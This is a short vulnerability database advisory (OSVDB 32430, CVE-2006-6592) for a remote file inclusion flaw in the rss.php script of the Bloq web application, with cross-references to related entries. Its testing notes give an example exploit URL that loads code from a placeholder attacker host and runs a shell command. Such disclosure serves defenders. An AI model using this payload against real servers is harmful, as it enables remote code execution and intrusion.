Bloq rss.php page[path] Variable Remote File Inclusion

2006-10-12T09:57:07
ID OSVDB:32430
Type osvdb
Reporter OSVDB
Modified 2006-10-12T09:57:07

Description

Manual Testing Notes

http://[target]/[path]/rss.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls

References:

Related OSVDB ID: 32428
Related OSVDB ID: 32429
Related OSVDB ID: 32431
Related OSVDB ID: 32432
Related OSVDB ID: 32433
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html
ISS X-Force ID: 29585
CVE-2006-6592
Bugtraq ID: 20512